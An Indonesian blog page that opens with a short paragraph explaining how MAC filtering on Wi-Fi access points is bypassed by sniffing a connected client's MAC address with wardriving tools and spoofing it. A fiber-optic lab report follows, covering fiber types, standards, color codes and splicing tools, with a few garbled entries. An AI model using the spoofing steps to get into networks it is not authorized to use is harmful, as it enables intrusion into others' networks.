    Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah. Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac, machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti MAC address.
    Masih sering ditemukan wifi di perkantoran dan bahkan ISP (yang biasanya digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point. Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC address tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.

10/09/12



Tujuan
Mengetahui dan memahami fiber optic dan jenis-jenisnya di berbagai medan
Isi laporan
Fungsi dari fiber optic ini sama saja dengan kabel Coaxial atau sejenisnya yaitu membawa data untuk namun Fiber optic hanya membawa muatan cahaya/infrared yang di konversi menjadi data/voice. Cahaya sebagai gelombang elektro, distribusi medan elektrik dan magnetic yang bergerak saling tegak lurus.
Semakin besar sudut masuk → semakin kecil sudut datang (pembiasan)
Semakin kecil sudut masuk cahaya → semakin kecil modus datanya (modus → 1 cahaya
Jenis-jenis fiber optic :

·         Step index singlemode
·         Step index multimode → sering dipakai di Indonesia
·         Graded index multimode
Sifat fiber optic :

1.       Step index singlemode
a.       Optik SL dengan Diameter core sangat kecil (8-12µm) dibanding ukuran cladding
b.      Cahaya hanya merambat dalam 1 mode sejajar dengan sumbu fiber optic
c.       Transmisi data jarak jauh dengan bitrate tinggi
2.       Step index multimode
a.       Index bias core konstan
b.      Ukuran core besar (50µm) dilapisi dengan cladding yang tipis
c.       Penyambungan kabel mudah karena core besar
d.      Terjadi disperse ( dalam istilah berarti kotor )
e.      Hanya digunakan pada jarak dekat
f.        Transmisi bitrate rendah
Struktur Fiber Optik



 





Macam-macam tipe Fiber Optic menurut CCITT
-          G652 - SingleMode Fiber
-          G653 - Dispertion-Shifted Singlemode Fiber
-          G653 - Characteristics 0f Cut-Off Shfted Mode F-Cable
-          G655 - Dispetior –Shifted Hun Zerodispetion Fiber
Keuntungan Fiber Optik :
1.       Bandwidth lebar, berjalan di frekuensi 1013-1016Hz
2.       Redaman sangat rendah
3.       Kebal gangguan elektromagnetik
4.       Menyalurkan sinyal digital kecepatan tinggi
5.       Memiliki ukuran yang kecil dan ringan
6.       Tidak mengalirkan arus listrik karena terbuat dari kaca
7.       Low cost/minim biaya
8.       Terdiri dari 2 macam : fleksibel dan kaku
9.       System dapat diandalkan (20-30 tahun) dan mudah perawatannya
Kerugian Fiber Optik :
1.       Konstruksi fiber optic lemah sehingga diperlukan lapisan penguat
2.       Karakteristik transmisi dapat berubah bila terjadi tekanan luar
3.       Tidak dapat dialiri arus listrik, sehingga tidak dapat memberikan catuan pada pasangan repeater
4.       Serat kaca bila masuk kulit tidak akan terdeteksi oleh ronsen

Kode warna fiber optic
1.       Biru
      7. Merah
2.       Orange
       8. Hitam
3.       Hijau
9.Kuning
4.       Coklat
10.   Ungu
5.       Abu-abu
11.   Pink
6.       Putih
12.   Torquise

Macam-macam kabel fiber optic
1.       ADSS
2.       OPGW
3.       Figure 8
4.       FTH
5.       FA
Tata cara penyambungan core Fiber Optik dan Patch Core :
Alat dan Bahan :
1.       Kabel Fiber Optik
2.       Patch Core
3.       Miller (pengupas lapisan pada core)
4.       Pengupas Jaket/Coating
5.       Cliver (pemotong core)
6.       Splicer











Simulasi Jaringan menggunakan kabel Fiber Optik jenis ADSS




Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More